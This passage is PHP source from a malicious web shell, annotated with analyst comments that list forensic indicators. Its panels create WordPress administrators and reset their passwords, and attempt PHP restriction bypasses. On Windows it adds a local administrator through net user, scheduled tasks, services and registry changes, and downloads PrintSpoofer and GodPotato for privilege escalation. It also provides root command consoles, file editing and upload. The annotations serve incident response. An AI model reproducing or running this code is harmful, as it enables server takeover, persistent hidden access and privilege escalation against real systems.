id="add_pass_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" 
placeholder="Pass"> <input type="text" id="add_email_<?= $dir_id ?>" value="wp_<?= rand(1,99) ?>@root.com" placeholder="Email"> <button class="btn" onclick="addAdmin('<?= addslashes($wp_dir) ?>', '<?= $dir_id ?>', this)">CREATE</button> </div> </div> <?php if (!$mysqli->connect_errno): $users = wp_fetch_users($mysqli, $cfg['prefix']); $site_url = get_site_url($mysqli, $cfg['prefix']); ?> <table class="data-table"> <thead> <tr><th>ID</th><th>User</th><th>Role</th><th>Reset</th><th>Action</th></tr> </thead> <tbody> <?php foreach($users as $u): ?> <tr> <td><?= $u['ID'] ?></td> <td><b class="text-primary"><?= htmlspecialchars($u['user_login']) ?></b></td> <td><span style="background: rgba(0,255,136,0.1); color: var(--accent); padding: 2px 6px; border-radius: 4px; font-size: 10px;"><?= $u['role'] ?></span></td> <td> <div style="display: flex; gap: 5px;"> <input type="text" id="p_<?= $u['ID'] ?>_<?= $dir_id ?>" value="yesim<?= rand(100,999) ?>!" style="width: 100px; padding: 4px 8px; font-size: 11px;"> <button class="btn btn-sm btn-primary" onclick="resetPassword('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>, 'p_<?= $u['ID'] ?>_<?= $dir_id ?>', this)">SET</button> </div> </td> <td> <div style="display: flex; gap: 8px;"> <a href="<?= htmlspecialchars($site_url) ?>/wp-login.php?log=<?= urlencode($u['user_login']) ?>" target="_blank" class="btn btn-sm"><i class="fas fa-sign-in-alt"></i></a> <button class="btn btn-sm" style="color: var(--primary);" onclick="deleteUser('<?= addslashes($wp_dir) ?>', <?= $u['ID'] ?>)"><i class="fas fa-trash"></i></button> </div> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; @$mysqli->close(); ?> </div> <?php endforeach; ?> <?php elseif(isset($_GET['bypasses'])): ?> <div class="title-section"> <h1>SECURITY <span>BYPASSES</span></h1> <p style="color: var(--text-dim);">Advanced Environment Escape Modules</p> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-microchip text-primary"></i> 1. 
PHP.INI / Disable Functions Override</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Trying to override restricted environment settings using available methods.</p> <div style="background: rgba(0,0,0,0.3); padding: 15px; border-radius: 8px; border: 1px solid var(--border);"> <div style="margin-bottom: 10px;">Method: <b>ini_set / ini_restore Evasion</b></div> <?php /* Analyst note: despite the panel title, this tag only attempts two runtime ini_set() calls and then prints labels derived from ini_get(). safe_mode was removed in PHP 5.4, so on later versions ini_get('safe_mode') is false and the first label reads BYPASSED / OFF regardless of host hardening. PHP allows open_basedir to be tightened at runtime but not widened, so the second call is not expected to lift a restriction set in php.ini or the vhost configuration; the second label depends only on whether ini_get() returns a non-empty string afterwards. */ @ini_set('safe_mode', '0'); @ini_set('open_basedir', 'none'); echo "Safe Mode Attempt: " . (@ini_get('safe_mode') ? '<span class="status-off">STILL ON</span>' : '<span class="status-on">BYPASSED / OFF</span>') . "<br>"; echo "Open Basedir Attempt: " . (@ini_get('open_basedir') ? '<span class="text-primary">' . @ini_get('open_basedir') . '</span>' : '<span class="status-on">NONE / BYPASSED</span>'); ?> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> 2. Execution Method Scanner</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Scanning for active command execution primitives.</p> <div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;"> <?php /* Analyst note: read-only probe. function_exists() is evaluated for each listed name and a label is printed; nothing is invoked in this tag. Names blocked through disable_functions are normally reported as DISABLED, so the grid mirrors the host's PHP hardening state. */ $primitives = ['system','shell_exec','passthru','exec','popen','proc_open','pcntl_exec','python_eval']; foreach($primitives as $p) { $status = function_exists($p) ? '<span class="status-on">ACTIVE</span>' : '<span class="status-off">DISABLED</span>'; echo "<div style='background:rgba(255,255,255,0.03); padding: 10px; border-radius: 6px;'><b>$p:</b> $status</div>"; } ?> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-user-secret text-primary"></i> 3. 
Stealth Loader (LD_PRELOAD placeholder)</h3> <p style="margin-bottom: 15px; font-size: 13px; color: var(--text-dim);">Advanced bypass using shared object injection.</p> <button class="btn" onclick="alert('Module planned: SO injection for disable_functions bypass.')">DEPLOY MODULE</button> </div> <?php elseif(isset($_GET['settings'])): ?> <div class="title-section"> <h1>SHELL <span>SETTINGS</span></h1> <p style="color: var(--text-dim);">Configuration and Access Control</p> </div> <div class="card" style="max-width: 600px;"> <h3 style="margin-bottom: 25px;"><i class="fas fa-lock text-primary"></i> Access Protection</h3> <form id="settings-form"> <div style="margin-bottom: 20px;"> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">LOGIN PROTECTION</label> <select id="login_enable" name="login_enable" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px; width: 100%;"> <option value="1" <?= $pagePasswordEnable === '1' ? 'selected' : '' ?>>ENABLED</option> <option value="0" <?= $pagePasswordEnable === '0' ? 
'selected' : '' ?>>DISABLED (OPEN)</option> </select> </div> <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 20px; margin-bottom: 25px;"> <div> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">USERNAME</label> <input type="text" id="login_user" value="<?= htmlspecialchars($username) ?>"> </div> <div> <label style="display: block; font-size: 11px; color: var(--primary); margin-bottom: 8px;">PASSWORD</label> <input type="text" id="login_pass" value="<?= htmlspecialchars($password) ?>"> </div> </div> <button type="button" class="btn btn-primary" style="width: 100%; justify-content: center;" onclick="saveSettings()"> <i class="fas fa-save"></i> SAVE CONFIGURATION </button> </form> </div> <script> function saveSettings() { const enable = document.getElementById('login_enable').value; const user = document.getElementById('login_user').value; const pass = document.getElementById('login_pass').value; const fd = new FormData(); fd.append('save_settings', '1'); fd.append('login_enable', enable); fd.append('login_user', user); fd.append('login_pass', pass); fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> <?php elseif(isset($_GET['winr00t'])): ?> <div class="title-section"> <h1>WINDOWS <span>ROOT</span></h1> <p style="color: var(--text-dim);">Ultra Admin Creator Bypass (Windows/2025)</p> </div> <div class="card"> <form method="post"> <div style="display: flex; gap: 10px; align-items: center; flex-wrap: wrap; margin-bottom: 20px;"> <div style="flex: 1; min-width: 200px;"> <label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN USERNAME</label> <input type="text" name="win_user" value="<?= htmlspecialchars($_POST['win_user'] ?? 
'root_adm') ?>"> </div> <div style="flex: 1; min-width: 200px;"> <label style="display: block; font-size: 11px; margin-bottom: 5px; color: var(--primary);">ADMIN PASSWORD</label> <?php $rand_pw = substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'), 0, 12); ?> <input type="text" name="win_pass" value="<?= htmlspecialchars($_POST['win_pass'] ?? $rand_pw) ?>"> </div> <button type="submit" name="do_winroot" class="btn btn-primary" style="margin-top: 18px;"> <i class="fas fa-user-plus"></i> INJECT ADMIN </button> </div> </form> <?php /* Analyst note (Windows panel of a malicious web shell): the code in this tag reads the RDP port (registry value PortNumber, then netstat) and, when do_winroot is posted, walks a list of commands that try to create a local account and add it to Administrators, stopping at the first one whose output looks successful. All commands go through root_exec(), which is defined outside this excerpt. Strings from the code that follows that responders can search for in process-creation, Task Scheduler and service logs: task name root_task, service name r00tsvc, the Winlogon AutoAdminLogon value, and executables written to C:\Windows\Temp as ps_NNN.exe or gp_NNN.exe (unlinked again after use). Where the matching audit policy is enabled, account creation and group changes also appear in the Security log (events 4720 and 4732), task creation as 4698, and service installation as System event 7045. The chosen user name and password are kept in the PHP session in clear text. */ function detect_rdp_port() { $reg = root_exec('reg query "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp" /v PortNumber 2>&1'); if (preg_match('/PortNumber\s+REG_DWORD\s+0x([0-9a-f]+)/i', $reg, $m)) return hexdec($m[1]); $netstat = root_exec('netstat -an | find ":3389"'); if (strpos($netstat, '3389') !== false) return 3389; return 'Unknown'; } $rdp_port = detect_rdp_port(); echo "<div style='margin-bottom: 15px; font-weight: 600;'>RDP Port: <span class='text-accent'>$rdp_port</span></div>"; if (isset($_POST['do_winroot'])) { $u = preg_replace('/[^a-zA-Z0-9_\-]/','',$_POST['win_user']); $p = $_POST['win_pass']; echo '<pre style="background: #000; color: #0f0; padding: 20px; border-radius: 8px; font-family: monospace; font-size: 12px; max-height: 400px; overflow: auto; border: 1px solid #333;">'; function wout($msg) { echo htmlspecialchars($msg)."\n"; ob_flush(); flush(); } function prvd_exec_with_timeout($cmd, $timeout = 10) { $cmd_esc = str_replace('"', '\"', $cmd); // Using -WorkingDirectory and better error suppression to handle permission/path issues $ps = "powershell -Command \"\$p = Start-Process -FilePath 'cmd.exe' -ArgumentList '/c $cmd_esc' -NoNewWindow -PassThru -WorkingDirectory 'C:\\Windows\\Temp'; if (\$p) { \$p | Wait-Process -Timeout $timeout; if(-not \$p.HasExited){\$p.Kill()} }\""; $out = root_exec($ps.' 
2>&1'); if (trim($out) && stripos($out, 'invalid') === false && stripos($out, 'error') === false) return $out; // Fallback to direct execution if PowerShell timed out or failed return root_exec($cmd.' 2>&1'); } $methods = [ ["[*] net user (classic)", "net user \"$u\" \"$p\" /add && net localgroup Administrators \"$u\" /add"], ["[*] PowerShell (background)", "powershell -Command \"net user $u $p /add; net localgroup Administrators $u /add\""], ["[*] schtasks", "schtasks /create /tn root_task /tr \"cmd.exe /c net user $u $p /add && net localgroup Administrators $u /add\" /sc onstart /ru System"], ["[*] sc service exploit", "sc create r00tsvc rootPath= \"cmd /c net user $u $p /add & net localgroup Administrators $u /add\" start= auto"], ["[*] Registry AutoAdminLogon", "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AutoAdminLogon /t REG_SZ /d 1 /f"], ["[*] Fallback CMD", "cmd /c net user $u $p /add & net localgroup Administrators $u /add"], ["[*] PowerShell Script Chain", "powershell -Command \"Start-Process cmd -ArgumentList '/c net user $u $p /add && net localgroup Administrators $u /add' -Verb runAs\""], ["[*] SeImpersonate (Potato/PrintSpoofer Check)", "whoami /priv | findstr /i SeImpersonatePrivilege"] ]; $success = false; foreach ($methods as $index => $step) { list($label, $cmd) = $step; wout($label . "..."); // Advanced handling for SeImpersonatePrivilege if (strpos($label, "SeImpersonate") !== false) { $priv_check = root_exec($cmd); if (stripos($priv_check, "enabled") !== false || stripos($priv_check, "disabled") !== false) { wout("[!] SeImpersonatePrivilege Bulundu! Patlama Yakın..."); // Verification function $check_user = function($uname) { $check = root_exec("net user $uname 2>&1"); return (stripos($check, "User name") !== false && stripos($check, "The command completed successfully") === false) || stripos($check, "Local Group Memberships") !== false; }; // 1. 
Try PrintSpoofer wout("[*] PrintSpoofer exploit deneniyor..."); $ps_url = "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe"; $ps_path = "C:\\Windows\\Temp\\ps_" . rand(100,999) . ".exe"; if (root_smart_download($ps_url, $ps_path)) { $exp_cmd = "$ps_path -c \"cmd /c net user $u $p /add && net localgroup Administrators $u /add\""; root_exec($exp_cmd . " 2>&1"); @unlink($ps_path); if ($check_user($u)) { wout("[+] PrintSpoofer BAŞARILI!"); $success = true; break; } } // 2. Try GodPotato (Fallback) if (!$success) { wout("[*] GodPotato exploit deneniyor..."); $gp_url = "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe"; $gp_path = "C:\\Windows\\Temp\\gp_" . rand(100,999) . ".exe"; if (root_smart_download($gp_url, $gp_path)) { $exp_cmd = "$gp_path -cmd \"cmd /c net user $u $p /add && net localgroup Administrators $u /add\""; root_exec($exp_cmd . " 2>&1"); @unlink($gp_path); if ($check_user($u)) { wout("[+] GodPotato BAŞARILI!"); $success = true; break; } } } if (!$success) wout("[!] SeImpersonate exploitleri başarısız oldu."); } } $res = prvd_exec_with_timeout($cmd, 5); wout($res); if (stripos($res, 'success') !== false || stripos($res, 'ok') !== false || stripos($res, 'already exists') !== false || stripos($res, 'successfully') !== false) { wout("[+] Admin user injected!"); $success = true; break; } } if ($success) { $_SESSION['winroot_success'] = true; $_SESSION['winroot_u'] = $u; $_SESSION['winroot_p'] = $p; wout("\n[+] 0wn3d! Admin user created:\n[+] User: $u\n[+] Pass: $p"); } else { wout("\n[!] 
Root failed :: No vector worked."); } echo '</pre>'; } if ($_SESSION['winroot_success']): $u = $_SESSION['winroot_u']; $p = $_SESSION['winroot_p']; ?> <div class="card" style="border: 1px solid var(--primary); background: rgba(255, 62, 62, 0.05); margin-top: 20px;"> <h4 style="margin-bottom: 15px;"><i class="fas fa-bolt text-primary"></i> Run Commands as Admin</h4> <form method="post"> <input type="hidden" name="adm_u" value="<?= htmlspecialchars($u) ?>"> <input type="hidden" name="adm_p" value="<?= htmlspecialchars($p) ?>"> <div style="display: flex; gap: 10px;"> <input type="text" name="adm_cmd" value="<?= htmlspecialchars($_POST['adm_cmd'] ?? 'whoami /all') ?>" placeholder="Enter command..."> <button type="submit" name="run_as_adm" class="btn btn-primary">EXECUTE</button> </div> </form> <?php /* Analyst note: this branch runs the posted adm_cmd under the account stored in the session, first through a scheduled task named root_admtask and then, if no output file appears, through PowerShell Start-Process with an explicit credential. Output is redirected to C:\Windows\Temp\out_NNNN.txt. The output file and the task are both deleted at the end of the branch, so process-creation and Task Scheduler logs are more durable evidence than on-disk remnants. The account password is passed on the command line in clear text (/rp and ConvertTo-SecureString -AsPlainText), which makes it visible to command-line logging. */ if (isset($_POST['run_as_adm'])): $cmd = $_POST['adm_cmd']; $cmdfile = "C:\\Windows\\Temp\\out_" . rand(1000, 9999) . ".txt"; wout("[*] Executing: $cmd"); // Try schtasks method $scht = "schtasks /create /tn root_admtask /tr \"cmd.exe /c $cmd > $cmdfile 2>&1\" /sc once /st 00:00 /ru \"$u\" /rp \"$p\""; root_exec($scht.' 2>&1'); root_exec("schtasks /run /tn root_admtask 2>&1"); sleep(1); $output = @file_get_contents($cmdfile); if(!$output) { // Fallback PowerShell $pw = 'powershell -Command "Start-Process cmd -ArgumentList \'/c '.$cmd.' > '.$cmdfile.' 2>&1\' -Credential (New-Object System.Management.Automation.PSCredential(\''.$u.'\',(ConvertTo-SecureString \''.$p.'\' -AsPlainText -Force))) -WindowStyle Hidden"'; root_exec($pw.' 2>&1'); sleep(1); $output = @file_get_contents($cmdfile); } echo '<pre style="margin-top: 15px; color: var(--accent);">' . ($output ?: 'No output or execution failed.') . 
'</pre>'; @unlink($cmdfile); @root_exec('schtasks /delete /tn root_admtask /f 2>&1'); endif; ?> </div> <?php endif; ?> </div> <?php elseif(isset($_GET['linr00t'])): ?> <div class="title-section"> <h1>LINUX <span>ROOT</span></h1> <p style="color: var(--text-dim);">Kernel Privilege Escalation & System Analysis</p> </div> <div style="display: grid; grid-template-columns: 1fr 350px; gap: 25px;"> <div class="left-col"> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-search text-primary"></i> System Diagnostics</h3> <div style="display: grid; grid-template-columns: 1fr 1fr; gap: 15px;"> <div class="info-item"><span class="info-label">Kernel:</span> <span class="info-value"><?= root_exec('uname -r') ?></span></div> <div class="info-item"><span class="info-label">Architecture:</span> <span class="info-value"><?= root_exec('uname -m') ?></span></div> <div class="info-item"><span class="info-label">Distribution:</span> <span class="info-value"><?= root_exec('cat /etc/issue | head -n 1') ?></span></div> <div class="info-item"><span class="info-label">GLIBC:</span> <span class="info-value"><?= root_exec('ldd --version | head -n 1') ?></span></div> <div class="info-item"><span class="info-label">Uptime:</span> <span class="info-value"><?= root_exec('uptime -p') ?></span></div> <div class="info-item"><span class="info-label">Current User:</span> <span class="info-value text-accent"><?= root_exec('id') ?></span></div> </div> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-terminal text-primary"></i> Root Console</h3> <form method="post"> <div style="display: flex; gap: 10px;"> <input type="text" name="lin_cmd" value="<?= htmlspecialchars($_POST['lin_cmd'] ?? 
'id; whoami') ?>" placeholder="Enter command to run as root..."> <button type="submit" name="run_lin_cmd" class="btn btn-primary">EXECUTE</button> </div> </form> <?php if (isset($_POST['run_lin_cmd'])): ?> <pre style="margin-top: 15px; background: #000; color: #0f0; padding: 15px; border-radius: 8px; font-family: monospace; border: 1px solid #333;"><?= htmlspecialchars(root_exec($_POST['lin_cmd'])) ?></pre> <?php endif; ?> </div> <div class="card"> <h3 style="margin-bottom: 20px;"><i class="fas fa-shield-alt text-primary"></i> SUID Binary Search</h3> <p style="font-size: 12px; color: var(--text-dim); margin-bottom: 15px;">Scanning for binaries with the SUID bit set (potential escalation vectors).</p> <pre style="max-height: 200px; overflow: auto; font-size: 11px; background: rgba(0,0,0,0.2); padding: 10px;"><?= root_exec('find /usr/bin /usr/sbin -perm -4000 -size -2M 2>/dev/null | head -n 15') ?></pre> </div> </div> <div class="right-col"> <div class="card" style="height: 100%;"> <h3 style="margin-bottom: 20px;"><i class="fas fa-history text-primary"></i> Exploit Log</h3> <div id="log-container" style="background: #000; height: 400px; padding: 15px; border-radius: 8px; font-family: 'JetBrains Mono', monospace; font-size: 11px; overflow-y: auto; color: #aaa; border: 1px solid #333;"> <?php if (isset($_SESSION['root_log'])) { foreach ($_SESSION['root_log'] as $log) { echo "<div>" . htmlspecialchars($log) . 
"</div>"; } } else { echo "<div class='text-dim'>Standing by for operations...</div>"; } ?> </div> <div style="margin-top: 20px;"> <form method="post"> <input type="hidden" name="action" value="auto_root"> <button type="submit" class="btn btn-primary" style="width: 100%; justify-content: center;"> <i class="fas fa-bolt"></i> RUN AUTO-ROOT </button> </form> <button class="btn" style="width: 100%; margin-top: 10px; justify-content: center;" onclick="window.location.href='?linr00t&clear_log=1'"> <i class="fas fa-trash-alt"></i> CLEAR LOG </button> </div> </div> </div> </div> <?php if (isset($_GET['clear_log'])) { $_SESSION['root_log'] = []; header("Location: ?linr00t"); exit; } ?> <?php elseif(isset($_GET['scan'])): ?> <div class="title-section"> <h1>BACKDOOR <span>SCANNER</span></h1> <p style="color: var(--text-dim);">Advanced Heuristic & Pattern Based Analysis</p> </div> <div class="card"> <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 25px;"> <div> <h3 style="margin-bottom: 5px;"><i class="fas fa-shield-alt text-primary"></i> System Integrity Check</h3> <?php $scan_base = root_find_scan_base(); ?> <p style="font-size: 13px; color: var(--text-dim);">Auto-Detected Root: <span class="text-accent"><?= htmlspecialchars($scan_base) ?></span></p> </div> <button class="btn btn-primary" onclick="window.location.href='?scan&do_scan=1'"> <i class="fas fa-play"></i> START FULL SCAN </button> </div> <?php if (isset($_GET['do_scan'])): ?> <?php $results = []; $scan_base = root_find_scan_base(); root_scanner_scan($scan_base, $results); usort($results, function($a, $b) { return $b['score'] - $a['score']; }); ?> <div style="margin-bottom: 20px;"> <span class="badge-system">FILES CHECKED: UNLIMITED</span> <span class="badge-system" style="margin-left: 10px;">THREATS FOUND: <?= count($results) ?></span> </div> <table class="data-table"> <thead> <tr><th>Danger</th><th>File Path</th><th>Detected 
Patterns</th><th>Size</th><th>Action</th></tr> </thead> <tbody> <?php foreach($results as $r): $color = $r['score'] >= 50 ? 'var(--primary)' : ($r['score'] >= 30 ? 'orange' : 'var(--accent)'); ?> <tr> <td> <div style="display: flex; align-items: center; gap: 8px;"> <div style="width: 10px; height: 10px; border-radius: 50%; background: <?= $color ?>; box-shadow: 0 0 10px <?= $color ?>;"></div> <b style="color: <?= $color ?>;"><?= $r['score'] ?>%</b> </div> </td> <td><span style="font-size: 11px; word-break: break-all;"><?= htmlspecialchars($r['path']) ?></span></td> <td> <div style="display: flex; flex-wrap: wrap; gap: 4px;"> <?php foreach($r['matches'] as $m): ?> <span style="background: rgba(255,255,255,0.05); padding: 2px 5px; border-radius: 3px; font-size: 9px;"><?= htmlspecialchars($m) ?></span> <?php endforeach; ?> </div> </td> <td style="font-size: 11px;"><?= formatSizeUnits($r['size']) ?></td> <td> <a href="?p=<?= encodePath(dirname($r['path'])) ?>&e=<?= urlencode(basename($r['path'])) ?>" class="btn btn-sm"><i class="fas fa-code"></i> Edit</a> </td> </tr> <?php endforeach; if(empty($results)): ?> <tr><td colspan="5" style="text-align: center; padding: 50px; color: var(--text-dim);">No suspicious files found in this directory.</td></tr> <?php endif; ?> </tbody> </table> <?php else: ?> <div style="text-align: center; padding: 60px; border: 2px dashed var(--border); border-radius: 12px;"> <i class="fas fa-search-plus" style="font-size: 3rem; color: var(--border); margin-bottom: 20px; display: block;"></i> <h4 style="color: var(--text-dim);">Click the button above to start a deep recursive scan.</h4> <p style="font-size: 12px; color: rgba(255,255,255,0.2); margin-top: 10px;">The scanner looks for eval, exec, base64, and other shell-like patterns used in backdoors.</p> </div> <?php endif; ?> </div> <?php elseif(isset($_GET['e'])): ?> <div class="title-section"> <h1>FILE <span>EDITOR</span></h1> <a href="?p=<?= encodePath(PATH) ?>" class="btn">BACK</a> </div> 
<div class="card"> <form method="post"> <h3 style="margin-bottom: 15px;"><?= htmlspecialchars($_GET['e']) ?></h3> <textarea name="content" style="height: 500px; font-family: 'JetBrains Mono', monospace; background: #000; border: 1px solid #333; font-size: 12px; line-height: 1.6; color: #00ff00;"><?= htmlspecialchars(file_get_contents(PATH . DIRECTORY_SEPARATOR . $_GET['e'])) ?></textarea> <div style="margin-top: 20px; text-align: right;"> <button type="submit" name="edit" class="btn"><i class="fas fa-save"></i> SAVE FILE</button> </div> </form> </div> <?php elseif(isset($_GET['r'])): ?> <div class="card" style="max-width: 500px; margin: 100px auto;"> <h2 style="margin-bottom: 20px;">RENAME ITEM</h2> <form method="post"> <input type="text" name="new_name" value="<?= htmlspecialchars($_GET['r']) ?>" autofocus> <div style="margin-top: 20px; display: flex; gap: 10px;"> <button type="submit" name="rename" class="btn btn-primary" style="flex: 1;">RENAME</button> <a href="?p=<?= encodePath(PATH) ?>" class="btn" style="flex: 1;">CANCEL</a> </div> </form> </div> <?php else: ?> <div class="title-section"> <h1>FILE <span>MANAGER</span></h1> <div style="display: flex; gap: 10px;"> <button class="btn" onclick="toggle('create-panel')"><i class="fas fa-plus-circle"></i> NEW ENTRY</button> <button class="btn btn-primary" onclick="toggle('upload-box')"><i class="fas fa-cloud-upload-alt"></i> Upload</button> </div> </div> <div id="create-panel" class="card hidden animate__animated animate__fadeInDown"> <h3 style="margin-bottom: 15px;"><i class="fas fa-plus-circle text-primary"></i> Create New Item</h3> <div style="display: grid; grid-template-columns: 1fr 150px; gap: 10px; margin-bottom: 15px;"> <input type="text" id="new_item_name" placeholder="Name (e.g. 
index.php or /assets)"> <select id="new_item_type" style="background: rgba(255,255,255,0.05); border: 1px solid var(--border); color: #fff; padding: 10px; border-radius: 6px;"> <option value="file">FILE</option> <option value="folder">FOLDER</option> </select> </div> <textarea id="new_item_content" style="height: 150px; margin-bottom: 15px;" placeholder="Initial content for the file..."></textarea> <div style="display: flex; gap: 10px; justify-content: flex-end;"> <button class="btn" onclick="toggle('create-panel')">CANCEL</button> <button class="btn btn-primary" onclick="submitCreate()">CREATE NOW</button> </div> <script> function submitCreate() { const name = document.getElementById('new_item_name').value; const type = document.getElementById('new_item_type').value; const content = document.getElementById('new_item_content').value; if(!name) return alert('Name required'); const fd = new FormData(); fd.append('fm_action', type === 'file' ? 'create_file' : 'create_folder'); fd.append('name', name); if(type === 'file') fd.append('content', content); fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => { alert(data.message); if(data.status === 'success') window.location.reload(); }); } </script> </div> <div class="breadcrumb"> <i class="fas fa-folder-open text-primary"></i> <?php $parts = explode(DIRECTORY_SEPARATOR, PATH); $built = ''; foreach($parts as $id => $part): if($part === '') continue; $built .= ($id == 0 ? '' : DIRECTORY_SEPARATOR) . 
$part; echo "/ <a href='?p=".encodePath($built)."'>".htmlspecialchars($part)."</a> "; endforeach; ?> </div> <div id="upload-box" class="card hidden animate__animated animate__fadeInDown"> <form method="post" enctype="multipart/form-data"> <input type="file" name="fileToUpload" style="margin-bottom: 20px;"> <button type="submit" name="upload" class="btn btn-primary">START UPLOAD</button> </form> </div> <div class="card" style="padding: 0; overflow: hidden;"> <table class="data-table"> <thead> <tr><th>Name</th><th>Size</th><th>Date</th><th>Perms</th><th>Actions</th></tr> </thead> <tbody> <?php $items = scandir(PATH); $dirs = []; $fs = []; foreach($items as $i) { if($i=='.'||$i=='..') continue; if(is_dir(PATH.DIRECTORY_SEPARATOR.$i)) $dirs[]=$i; else $fs[]=$i; } foreach($dirs as $d): $p = PATH.DIRECTORY_SEPARATOR.$d; ?> <tr> <td><a href="?p=<?= encodePath($p) ?>" style="text-decoration:none; color:inherit; font-weight:bold;"><i class="fas fa-folder text-primary"></i> <?= htmlspecialchars($d) ?></a></td> <td class="text-dim">--</td> <td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td> <td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td> <td style="text-align: right;"> <a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($d) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a> <a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($d) ?>" class="btn btn-sm" style="color: var(--primary);" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a> </td> </tr> <?php endforeach; ?> <?php foreach($fs as $f): $p = PATH.DIRECTORY_SEPARATOR.$f; ?> <tr> <td><?= fileIcon($f) ?> <?= htmlspecialchars($f) ?></td> <td style="font-size: 11px;"><?= formatSizeUnits(filesize($p)) ?></td> <td style="font-size: 11px;"><?= date("Y-m-d H:i", filemtime($p)) ?></td> <td><span style="color: var(--accent);"><?= substr(sprintf('%o', fileperms($p)), -4) ?></span></td> <td style="text-align: right;"> <a href="?q=<?= 
encodePath(PATH) ?>&e=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-code"></i></a> <a href="?q=<?= encodePath(PATH) ?>&r=<?= urlencode($f) ?>" class="btn btn-sm"><i class="fas fa-edit"></i></a> <a href="?q=<?= encodePath(PATH) ?>&d=<?= urlencode($f) ?>" class="btn btn-sm" style="color: var(--primary);" onclick="return confirm('Delete?')"><i class="fas fa-trash"></i></a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> <?php endif; ?> </main> </div> </body> </html>